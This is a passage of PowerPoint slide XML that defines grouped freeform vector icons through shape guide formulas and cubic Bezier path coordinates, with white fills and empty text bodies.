                    <a:pt x="232" y="55"/>
                    <a:pt x="232" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="66"/>
                    <a:pt x="195" y="76"/>
                    <a:pt x="176" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="88"/>
                    <a:pt x="173" y="88"/>
                    <a:pt x="171" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="84"/>
                    <a:pt x="139" y="87"/>
                    <a:pt x="124" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="107"/>
                    <a:pt x="83" y="118"/>
                    <a:pt x="62" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="131"/>
                    <a:pt x="60" y="133"/>
                    <a:pt x="60" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="147"/>
                    <a:pt x="50" y="157"/>
                    <a:pt x="38" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="164"/>
                    <a:pt x="15" y="159"/>
                    <a:pt x="8" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="139"/>
                    <a:pt x="0" y="124"/>
                    <a:pt x="9" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="103"/>
                    <a:pt x="33" y="101"/>
                    <a:pt x="44" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="108"/>
                    <a:pt x="48" y="109"/>
                    <a:pt x="50" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="96"/>
                    <a:pt x="92" y="84"/>
                    <a:pt x="113" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="64"/>
                    <a:pt x="136" y="52"/>
                    <a:pt x="142" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="36"/>
                    <a:pt x="145" y="33"/>
                    <a:pt x="147" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="22"/>
                    <a:pt x="183" y="12"/>
                    <a:pt x="201" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="2"/>
                    <a:pt x="203" y="1"/>
                    <a:pt x="2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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="Freeform 1191"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1187451" y="5561013"/>
              <a:ext cx="198438" cy="201612"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 172 w 176"/>
                <a:gd name="T1" fmla="*/ 80 h 179"/>
                <a:gd name="T2" fmla="*/ 116 w 176"/>
                <a:gd name="T3" fmla="*/ 167 h 179"/>
                <a:gd name="T4" fmla="*/ 18 w 176"/>
                <a:gd name="T5" fmla="*/ 127 h 179"/>
                <a:gd name="T6" fmla="*/ 38 w 176"/>
                <a:gd name="T7" fmla="*/ 25 h 179"/>
                <a:gd name="T8" fmla="*/ 139 w 176"/>
                <a:gd name="T9" fmla="*/ 22 h 179"/>
                <a:gd name="T10" fmla="*/ 136 w 176"/>
                <a:gd name="T11" fmla="*/ 24 h 179"/>
                <a:gd name="T12" fmla="*/ 126 w 176"/>
                <a:gd name="T13" fmla="*/ 30 h 179"/>
                <a:gd name="T14" fmla="*/ 102 w 176"/>
                <a:gd name="T15" fmla="*/ 34 h 179"/>
                <a:gd name="T16" fmla="*/ 36 w 176"/>
                <a:gd name="T17" fmla="*/ 78 h 179"/>
                <a:gd name="T18" fmla="*/ 81 w 176"/>
                <a:gd name="T19" fmla="*/ 144 h 179"/>
                <a:gd name="T20" fmla="*/ 145 w 176"/>
                <a:gd name="T21" fmla="*/ 99 h 179"/>
                <a:gd name="T22" fmla="*/ 150 w 176"/>
                <a:gd name="T23" fmla="*/ 93 h 179"/>
                <a:gd name="T24" fmla="*/ 172 w 176"/>
                <a:gd name="T25" fmla="*/ 8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179">
                  <a:moveTo>
                    <a:pt x="172" y="80"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="121"/>
                    <a:pt x="151" y="156"/>
                    <a:pt x="116" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="179"/>
                    <a:pt x="37" y="162"/>
                    <a:pt x="18" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="8" y="51"/>
                    <a:pt x="38" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="1"/>
                    <a:pt x="111" y="0"/>
                    <a:pt x="139" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="23"/>
                    <a:pt x="137" y="24"/>
                    <a:pt x="136" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="26"/>
                    <a:pt x="129" y="28"/>
                    <a:pt x="126" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="35"/>
                    <a:pt x="111" y="37"/>
                    <a:pt x="102" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="27"/>
                    <a:pt x="42" y="48"/>
                    <a:pt x="36" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="108"/>
                    <a:pt x="51" y="138"/>
                    <a:pt x="81" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="149"/>
                    <a:pt x="140" y="129"/>
                    <a:pt x="145" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="96"/>
                    <a:pt x="147" y="94"/>
                    <a:pt x="150" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="89"/>
                    <a:pt x="165" y="85"/>
                    <a:pt x="172"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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="89" name="Gruppieren 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6258287" y="4965284"/>
            <a:ext cx="447704" cy="550770"/>
            <a:chOff x="8256554" y="-441834"/>
            <a:chExt cx="428304" cy="508611"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Freeform 1252"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8327938" y="-441834"/>
              <a:ext cx="283306" cy="316767"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 179 w 179"/>
                <a:gd name="T1" fmla="*/ 105 h 199"/>
                <a:gd name="T2" fmla="*/ 179 w 179"/>
                <a:gd name="T3" fmla="*/ 149 h 199"/>
                <a:gd name="T4" fmla="*/ 176 w 179"/>
                <a:gd name="T5" fmla="*/ 155 h 199"/>
                <a:gd name="T6" fmla="*/ 103 w 179"/>
                <a:gd name="T7" fmla="*/ 197 h 199"/>
                <a:gd name="T8" fmla="*/ 97 w 179"/>
                <a:gd name="T9" fmla="*/ 197 h 199"/>
                <a:gd name="T10" fmla="*/ 3 w 179"/>
                <a:gd name="T11" fmla="*/ 143 h 199"/>
                <a:gd name="T12" fmla="*/ 0 w 179"/>
                <a:gd name="T13" fmla="*/ 137 h 199"/>
                <a:gd name="T14" fmla="*/ 0 w 179"/>
                <a:gd name="T15" fmla="*/ 49 h 199"/>
                <a:gd name="T16" fmla="*/ 3 w 179"/>
                <a:gd name="T17" fmla="*/ 43 h 199"/>
                <a:gd name="T18" fmla="*/ 76 w 179"/>
                <a:gd name="T19" fmla="*/ 1 h 199"/>
                <a:gd name="T20" fmla="*/ 83 w 179"/>
                <a:gd name="T21" fmla="*/ 1 h 199"/>
                <a:gd name="T22" fmla="*/ 176 w 179"/>
                <a:gd name="T23" fmla="*/ 55 h 199"/>
                <a:gd name="T24" fmla="*/ 179 w 179"/>
                <a:gd name="T25" fmla="*/ 60 h 199"/>
                <a:gd name="T26" fmla="*/ 179 w 179"/>
                <a:gd name="T27" fmla="*/ 105 h 199"/>
                <a:gd name="T28" fmla="*/ 92 w 179"/>
                <a:gd name="T29" fmla="*/ 177 h 199"/>
                <a:gd name="T30" fmla="*/ 92 w 179"/>
                <a:gd name="T31" fmla="*/ 175 h 199"/>
                <a:gd name="T32" fmla="*/ 92 w 179"/>
                <a:gd name="T33" fmla="*/ 109 h 199"/>
                <a:gd name="T34" fmla="*/ 89 w 179"/>
                <a:gd name="T35" fmla="*/ 105 h 199"/>
                <a:gd name="T36" fmla="*/ 18 w 179"/>
                <a:gd name="T37" fmla="*/ 64 h 199"/>
                <a:gd name="T38" fmla="*/ 14 w 179"/>
                <a:gd name="T39" fmla="*/ 62 h 199"/>
                <a:gd name="T40" fmla="*/ 14 w 179"/>
                <a:gd name="T41" fmla="*/ 129 h 199"/>
                <a:gd name="T42" fmla="*/ 18 w 179"/>
                <a:gd name="T43" fmla="*/ 134 h 199"/>
                <a:gd name="T44" fmla="*/ 55 w 179"/>
                <a:gd name="T45" fmla="*/ 156 h 199"/>
                <a:gd name="T46" fmla="*/ 92 w 179"/>
                <a:gd name="T47" fmla="*/ 177 h 199"/>
                <a:gd name="T48" fmla="*/ 123 w 179"/>
                <a:gd name="T49" fmla="*/ 98 h 199"/>
                <a:gd name="T50" fmla="*/ 110 w 179"/>
                <a:gd name="T51" fmla="*/ 105 h 199"/>
                <a:gd name="T52" fmla="*/ 107 w 179"/>
                <a:gd name="T53" fmla="*/ 110 h 199"/>
                <a:gd name="T54" fmla="*/ 107 w 179"/>
                <a:gd name="T55" fmla="*/ 147 h 199"/>
                <a:gd name="T56" fmla="*/ 107 w 179"/>
                <a:gd name="T57" fmla="*/ 178 h 199"/>
                <a:gd name="T58" fmla="*/ 109 w 179"/>
                <a:gd name="T59" fmla="*/ 177 h 199"/>
                <a:gd name="T60" fmla="*/ 162 w 179"/>
                <a:gd name="T61" fmla="*/ 146 h 199"/>
                <a:gd name="T62" fmla="*/ 164 w 179"/>
                <a:gd name="T63" fmla="*/ 141 h 199"/>
                <a:gd name="T64" fmla="*/ 164 w 179"/>
                <a:gd name="T65" fmla="*/ 95 h 199"/>
                <a:gd name="T66" fmla="*/ 164 w 179"/>
                <a:gd name="T67" fmla="*/ 75 h 199"/>
                <a:gd name="T68" fmla="*/ 153 w 179"/>
                <a:gd name="T69" fmla="*/ 81 h 199"/>
                <a:gd name="T70" fmla="*/ 151 w 179"/>
                <a:gd name="T71" fmla="*/ 85 h 199"/>
                <a:gd name="T72" fmla="*/ 151 w 179"/>
                <a:gd name="T73" fmla="*/ 106 h 199"/>
                <a:gd name="T74" fmla="*/ 149 w 179"/>
                <a:gd name="T75" fmla="*/ 109 h 199"/>
                <a:gd name="T76" fmla="*/ 123 w 179"/>
                <a:gd name="T77" fmla="*/ 124 h 199"/>
                <a:gd name="T78" fmla="*/ 123 w 179"/>
                <a:gd name="T79" fmla="*/ 98 h 199"/>
                <a:gd name="T80" fmla="*/ 22 w 179"/>
                <a:gd name="T81" fmla="*/ 49 h 199"/>
                <a:gd name="T82" fmla="*/ 98 w 179"/>
                <a:gd name="T83" fmla="*/ 93 h 199"/>
                <a:gd name="T84" fmla="*/ 101 w 179"/>
                <a:gd name="T85" fmla="*/ 93 h 199"/>
                <a:gd name="T86" fmla="*/ 114 w 179"/>
                <a:gd name="T87" fmla="*/ 86 h 199"/>
                <a:gd name="T88" fmla="*/ 114 w 179"/>
                <a:gd name="T89" fmla="*/ 85 h 199"/>
                <a:gd name="T90" fmla="*/ 40 w 179"/>
                <a:gd name="T91" fmla="*/ 41 h 199"/>
                <a:gd name="T92" fmla="*/ 37 w 179"/>
                <a:gd name="T93" fmla="*/ 41 h 199"/>
                <a:gd name="T94" fmla="*/ 22 w 179"/>
                <a:gd name="T95" fmla="*/ 49 h 199"/>
                <a:gd name="T96" fmla="*/ 65 w 179"/>
                <a:gd name="T97" fmla="*/ 24 h 199"/>
                <a:gd name="T98" fmla="*/ 66 w 179"/>
                <a:gd name="T99" fmla="*/ 25 h 199"/>
                <a:gd name="T100" fmla="*/ 141 w 179"/>
                <a:gd name="T101" fmla="*/ 69 h 199"/>
                <a:gd name="T102" fmla="*/ 144 w 179"/>
                <a:gd name="T103" fmla="*/ 69 h 199"/>
                <a:gd name="T104" fmla="*/ 158 w 179"/>
                <a:gd name="T105" fmla="*/ 62 h 199"/>
                <a:gd name="T106" fmla="*/ 157 w 179"/>
                <a:gd name="T107" fmla="*/ 61 h 199"/>
                <a:gd name="T108" fmla="*/ 81 w 179"/>
                <a:gd name="T109" fmla="*/ 17 h 199"/>
                <a:gd name="T110" fmla="*/ 78 w 179"/>
                <a:gd name="T111" fmla="*/ 17 h 199"/>
                <a:gd name="T112" fmla="*/ 65 w 179"/>
                <a:gd name="T113" fmla="*/ 2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9" h="199">
                  <a:moveTo>
                    <a:pt x="179" y="105"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="120"/>
                    <a:pt x="179" y="135"/>
                    <a:pt x="179" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="152"/>
                    <a:pt x="178" y="153"/>
                    <a:pt x="176" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="169"/>
                    <a:pt x="127" y="183"/>
                    <a:pt x="103" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="199"/>
                    <a:pt x="99" y="199"/>
                    <a:pt x="97" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="179"/>
                    <a:pt x="34" y="161"/>
                    <a:pt x="3" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="141"/>
                    <a:pt x="0" y="140"/>
                    <a:pt x="0" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="78"/>
                    <a:pt x="0" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="46"/>
                    <a:pt x="1" y="45"/>
                    <a:pt x="3" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="29"/>
                    <a:pt x="52" y="15"/>
                    <a:pt x="76" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="0"/>
                    <a:pt x="81" y="0"/>
                    <a:pt x="83" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="19"/>
                    <a:pt x="145" y="37"/>
                    <a:pt x="176" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="57"/>
                    <a:pt x="179" y="58"/>
                    <a:pt x="179" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="75"/>
                    <a:pt x="179" y="90"/>
                    <a:pt x="179" y="105"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="92" y="177"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="176"/>
                    <a:pt x="92" y="176"/>
                    <a:pt x="92" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="153"/>
                    <a:pt x="92" y="131"/>
                    <a:pt x="92" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="107"/>
                    <a:pt x="91" y="106"/>
                    <a:pt x="89" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="91"/>
                    <a:pt x="42" y="78"/>
                    <a:pt x="18" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="63"/>
                    <a:pt x="16" y="63"/>
                    <a:pt x="14" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="85"/>
                    <a:pt x="15" y="107"/>
                    <a:pt x="14" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="132"/>
                    <a:pt x="15" y="133"/>
                    <a:pt x="18" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="142"/>
                    <a:pt x="42" y="149"/>
                    <a:pt x="55" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="163"/>
                    <a:pt x="79" y="170"/>
                    <a:pt x="92" y="177"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="123" y="98"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="100"/>
                    <a:pt x="114" y="103"/>
                    <a:pt x="110" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="106"/>
                    <a:pt x="107" y="108"/>
                    <a:pt x="107" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="123"/>
                    <a:pt x="107" y="135"/>
                    <a:pt x="107" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="157"/>
                    <a:pt x="107" y="167"/>
                    <a:pt x="107" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="177"/>
                    <a:pt x="108" y="177"/>
                    <a:pt x="109" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="166"/>
                    <a:pt x="144" y="156"/>
                    <a:pt x="162" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="145"/>
                    <a:pt x="164" y="143"/>
                    <a:pt x="164" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="126"/>
                    <a:pt x="164" y="110"/>
                    <a:pt x="164" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="88"/>
                    <a:pt x="164" y="82"/>
                    <a:pt x="164" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="77"/>
                    <a:pt x="156" y="79"/>
                    <a:pt x="153" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="82"/>
                    <a:pt x="151" y="84"/>
                    <a:pt x="151" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="92"/>
                    <a:pt x="151" y="99"/>
                    <a:pt x="151" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="107"/>
                    <a:pt x="150" y="109"/>
                    <a:pt x="149" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="114"/>
                    <a:pt x="132" y="119"/>
                    <a:pt x="123" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="115"/>
                    <a:pt x="123" y="107"/>
                    <a:pt x="123" y="98"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="22" y="49"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="64"/>
                    <a:pt x="73" y="79"/>
                    <a:pt x="98" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="94"/>
                    <a:pt x="100" y="94"/>
                    <a:pt x="101" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="91"/>
                    <a:pt x="110" y="88"/>
                    <a:pt x="114" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="85"/>
                    <a:pt x="114" y="85"/>
                    <a:pt x="114" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="70"/>
                    <a:pt x="65" y="56"/>
                    <a:pt x="40" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="41"/>
                    <a:pt x="38" y="40"/>
                    <a:pt x="37" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="43"/>
                    <a:pt x="27" y="46"/>
                    <a:pt x="22" y="49"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="65" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="25"/>
                    <a:pt x="66" y="25"/>
                    <a:pt x="66" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="40"/>
                    <a:pt x="116" y="55"/>
                    <a:pt x="141" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="70"/>
                    <a:pt x="143" y="70"/>
                    <a:pt x="144" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="67"/>
                    <a:pt x="153" y="64"/>
                    <a:pt x="158" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="62"/>
                    <a:pt x="157" y="61"/>
                    <a:pt x="157" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="47"/>
                    <a:pt x="107" y="32"/>
                    <a:pt x="81" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="17"/>
                    <a:pt x="79" y="17"/>
                    <a:pt x="78" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="19"/>
                    <a:pt x="69" y="22"/>
                    <a:pt x="6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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="Freeform 1253"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8499705" y="-236605"/>
              <a:ext cx="185153" cy="303382"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 79 w 117"/>
                <a:gd name="T1" fmla="*/ 190 h 190"/>
                <a:gd name="T2" fmla="*/ 76 w 117"/>
                <a:gd name="T3" fmla="*/ 190 h 190"/>
                <a:gd name="T4" fmla="*/ 16 w 117"/>
                <a:gd name="T5" fmla="*/ 190 h 190"/>
                <a:gd name="T6" fmla="*/ 12 w 117"/>
                <a:gd name="T7" fmla="*/ 187 h 190"/>
                <a:gd name="T8" fmla="*/ 1 w 117"/>
                <a:gd name="T9" fmla="*/ 137 h 190"/>
                <a:gd name="T10" fmla="*/ 18 w 117"/>
                <a:gd name="T11" fmla="*/ 91 h 190"/>
                <a:gd name="T12" fmla="*/ 43 w 117"/>
                <a:gd name="T13" fmla="*/ 65 h 190"/>
                <a:gd name="T14" fmla="*/ 59 w 117"/>
                <a:gd name="T15" fmla="*/ 59 h 190"/>
                <a:gd name="T16" fmla="*/ 67 w 117"/>
                <a:gd name="T17" fmla="*/ 80 h 190"/>
                <a:gd name="T18" fmla="*/ 44 w 117"/>
                <a:gd name="T19" fmla="*/ 106 h 190"/>
                <a:gd name="T20" fmla="*/ 41 w 117"/>
                <a:gd name="T21" fmla="*/ 110 h 190"/>
                <a:gd name="T22" fmla="*/ 42 w 117"/>
                <a:gd name="T23" fmla="*/ 116 h 190"/>
                <a:gd name="T24" fmla="*/ 48 w 117"/>
                <a:gd name="T25" fmla="*/ 116 h 190"/>
                <a:gd name="T26" fmla="*/ 51 w 117"/>
                <a:gd name="T27" fmla="*/ 114 h 190"/>
                <a:gd name="T28" fmla="*/ 84 w 117"/>
                <a:gd name="T29" fmla="*/ 77 h 190"/>
                <a:gd name="T30" fmla="*/ 90 w 117"/>
                <a:gd name="T31" fmla="*/ 60 h 190"/>
                <a:gd name="T32" fmla="*/ 90 w 117"/>
                <a:gd name="T33" fmla="*/ 19 h 190"/>
                <a:gd name="T34" fmla="*/ 90 w 117"/>
                <a:gd name="T35" fmla="*/ 13 h 190"/>
                <a:gd name="T36" fmla="*/ 105 w 117"/>
                <a:gd name="T37" fmla="*/ 1 h 190"/>
                <a:gd name="T38" fmla="*/ 117 w 117"/>
                <a:gd name="T39" fmla="*/ 15 h 190"/>
                <a:gd name="T40" fmla="*/ 117 w 117"/>
                <a:gd name="T41" fmla="*/ 56 h 190"/>
                <a:gd name="T42" fmla="*/ 117 w 117"/>
                <a:gd name="T43" fmla="*/ 79 h 190"/>
                <a:gd name="T44" fmla="*/ 108 w 117"/>
                <a:gd name="T45" fmla="*/ 105 h 190"/>
                <a:gd name="T46" fmla="*/ 88 w 117"/>
                <a:gd name="T47" fmla="*/ 146 h 190"/>
                <a:gd name="T48" fmla="*/ 80 w 117"/>
                <a:gd name="T49" fmla="*/ 187 h 190"/>
                <a:gd name="T50" fmla="*/ 79 w 117"/>
                <a:gd name="T5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190">
                  <a:moveTo>
                    <a:pt x="79" y="190"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="190"/>
                    <a:pt x="77" y="190"/>
                    <a:pt x="76" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="190"/>
                    <a:pt x="36" y="190"/>
                    <a:pt x="16" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="190"/>
                    <a:pt x="12" y="190"/>
                    <a:pt x="12" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="171"/>
                    <a:pt x="2" y="154"/>
                    <a:pt x="1" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="119"/>
                    <a:pt x="5" y="104"/>
                    <a:pt x="18" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="82"/>
                    <a:pt x="35" y="74"/>
                    <a:pt x="43" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="61"/>
                    <a:pt x="53" y="57"/>
                    <a:pt x="59" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="61"/>
                    <a:pt x="73" y="72"/>
                    <a:pt x="67" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="89"/>
                    <a:pt x="52" y="97"/>
                    <a:pt x="44" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="107"/>
                    <a:pt x="42" y="108"/>
                    <a:pt x="41" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="112"/>
                    <a:pt x="40" y="114"/>
                    <a:pt x="42" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="118"/>
                    <a:pt x="46" y="118"/>
                    <a:pt x="48" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="116"/>
                    <a:pt x="50" y="115"/>
                    <a:pt x="51" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="102"/>
                    <a:pt x="73" y="89"/>
                    <a:pt x="84" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="72"/>
                    <a:pt x="90" y="67"/>
                    <a:pt x="90" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="47"/>
                    <a:pt x="90" y="33"/>
                    <a:pt x="90" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="17"/>
                    <a:pt x="90" y="15"/>
                    <a:pt x="90" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="5"/>
                    <a:pt x="97" y="0"/>
                    <a:pt x="105" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="1"/>
                    <a:pt x="117" y="7"/>
                    <a:pt x="117" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="28"/>
                    <a:pt x="117" y="42"/>
                    <a:pt x="117" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="63"/>
                    <a:pt x="117" y="71"/>
                    <a:pt x="117" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="89"/>
                    <a:pt x="112" y="97"/>
